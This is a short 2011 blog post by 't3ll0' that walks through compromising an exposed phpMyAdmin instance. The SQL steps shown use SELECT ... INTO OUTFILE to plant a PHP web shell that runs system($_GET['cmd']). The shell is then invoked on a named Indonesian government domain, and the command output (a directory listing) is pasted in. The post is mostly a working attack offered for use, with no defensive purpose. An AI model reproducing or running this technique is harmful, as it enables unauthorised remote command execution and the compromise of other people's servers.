Tuesday, January 18, 2011

Hacking Through phpMyadmin


The first step was breaking the existing web phpmyadminnya .... then there will be the following display
wow ... sorry brother blog can not upload pictures hehe
for the sake of security possible ... ..
This script step ...

1. show variables
- The Result is……

Choose This “basedir C:\xampp\mysql\” as knowledge
2. select load_file(‘http://localhost/phpmyadmin/index.php’);
3. SELECT ‘\’;system($_GET[\'cmd\']); echo \’\’; ?>’ into outfile ‘C:/xampp/phpmyadmin/t3ll0.php’


type on the command in sql OM:
then type this address in the browser :

http://depkominfo.go.id/phpmyadmin/t3ll0.php
the result is :
Warning:  system() [function.system]: Cannot execute a blank command in C:\xampp\phpMyAdmin\t3ll0.php on line 1
and then type

http://depkominfo.go.id/phpmyadmin/t3ll0.php?cmd=dir
result is the same as we open the CMD:
Volume in drive C is System
Volume Serial Number is 1490-7E76

Directory of C:\xampp\phpMyAdmin

04/24/2005  10:00 AM              .
04/24/2005  10:00 AM              ..
08/06/2009  12:00 AM            10,886 browse_foreigners.php
08/06/2009  12:00 AM             4,354 bs_change_mime_type.php
08/06/2009  12:00 AM             1,797 bs_disp_as_mime_type.php
08/06/2009  12:00 AM             2,368 bs_play_media.php
08/06/2009  12:00 AM               845 calendar.php
08/06/2009  12:00 AM            27,022 ChangeLog
08/06/2009  12:00 AM             3,613 changelog.php
08/06/2009  12:00 AM               520 chk_rel.php
10/05/2010  11:58 AM             1,996 config.inc.php
08/06/2009  12:00 AM             1,507 db_create.php
08/06/2009  12:00 AM            10,469 db_datadict.php
08/06/2009  12:00 AM             2,454 db_export.php
08/06/2009  12:00 AM               491 db_import.php
08/06/2009  12:00 AM            25,830 db_operations.php
08/06/2009  12:00 AM             7,439 db_printview.php
08/06/2009  12:00 AM            30,632 db_qbe.php
08/06/2009  12:00 AM            13,151 db_search.php
08/06/2009  12:00 AM             1,008 db_sql.php
08/06/2009  12:00 AM            25,869 db_structure.php
08/06/2009  12:00 AM             3,365 docs.css
08/06/2009  12:00 AM           234,742 Documentation.html
08/06/2009  12:00 AM             2,193 error.php
08/06/2009  12:00 AM            23,781 export.php
08/06/2009  12:00 AM            18,902 favicon.ico
08/06/2009  12:00 AM            13,728 import.php
08/06/2009  12:00 AM             6,836 index.php
08/06/2009  12:00 AM              js
08/06/2009  12:00 AM              lang
08/06/2009  12:00 AM              libraries
08/06/2009  12:00 AM               500 license.php
08/06/2009  12:00 AM            13,233 main.php
08/06/2009  12:00 AM            25,891 navigation.php
08/06/2009  12:00 AM            27,054 pdf_pages.php
08/06/2009  12:00 AM            52,880 pdf_schema.php
08/06/2009  12:00 AM               468 phpinfo.php
08/06/2009  12:00 AM             1,133 phpmyadmin.css.php
08/06/2009  12:00 AM              pmd
08/06/2009  12:00 AM             9,895 pmd_common.php
08/06/2009  12:00 AM             1,917 pmd_display_field.php
08/06/2009  12:00 AM            18,556 pmd_general.php
08/06/2009  12:00 AM               880 pmd_help.php
08/06/2009  12:00 AM             3,571 pmd_pdf.php
08/06/2009  12:00 AM             4,041 pmd_relation_new.php
08/06/2009  12:00 AM             2,020 pmd_relation_upd.php
08/06/2009  12:00 AM             2,108 pmd_save_pos.php
08/06/2009  12:00 AM             1,063 print.css
08/06/2009  12:00 AM             8,280 querywindow.php
08/06/2009  12:00 AM                26 robots.txt
08/06/2009  12:00 AM             7,637 server_binlog.php
08/06/2009  12:00 AM             2,698 server_collations.php
08/06/2009  12:00 AM            13,514 server_databases.php
08/06/2009  12:00 AM             4,743 server_engines.php
08/06/2009  12:00 AM             1,667 server_export.php
08/06/2009  12:00 AM               506 server_import.php
08/06/2009  12:00 AM            97,424 server_privileges.php
08/06/2009  12:00 AM             2,951 server_processlist.php
08/06/2009  12:00 AM               615 server_sql.php
08/06/2009  12:00 AM            24,426 server_status.php
08/06/2009  12:00 AM             2,252 server_variables.php
08/06/2009  12:00 AM               355 show_config_errors.php
08/06/2009  12:00 AM            26,577 sql.php
04/24/2005  09:56 AM                59 t3ll0.php
08/06/2009  12:00 AM             8,185 tbl_addfield.php
08/06/2009  12:00 AM             7,300 tbl_alter.php
08/06/2009  12:00 AM            53,326 tbl_change.php
08/06/2009  12:00 AM             9,830 tbl_create.php
08/06/2009  12:00 AM             2,618 tbl_export.php
08/06/2009  12:00 AM               655 tbl_import.php
08/06/2009  12:00 AM             8,005 tbl_indexes.php
08/06/2009  12:00 AM             2,488 tbl_move_copy.php
08/06/2009  12:00 AM            26,634 tbl_operations.php
08/06/2009  12:00 AM            16,708 tbl_printview.php
08/06/2009  12:00 AM            22,265 tbl_relation.php
08/06/2009  12:00 AM            14,794 tbl_replace.php
08/06/2009  12:00 AM             4,922 tbl_row_action.php
08/06/2009  12:00 AM            16,163 tbl_select.php
08/06/2009  12:00 AM               948 tbl_sql.php
08/06/2009  12:00 AM            31,606 tbl_structure.php
08/06/2009  12:00 AM              themes
08/06/2009  12:00 AM             1,299 themes.php
08/06/2009  12:00 AM             1,688 transformation_overview.php
08/06/2009  12:00 AM             3,734 transformation_wrapper.php
08/06/2009  12:00 AM             9,415 translators.html
08/06/2009  12:00 AM             4,622 user_password.php
08/06/2009  12:00 AM             5,412 view_create.php
08/06/2009  12:00 AM             1,132 webapp.php
            81 File(s)      1,088,487 bytes
             7 Dir(s)  31,213,608,960 bytes free

Good Luck boys....... t3ll0

No comments:

Post a Comment

Comments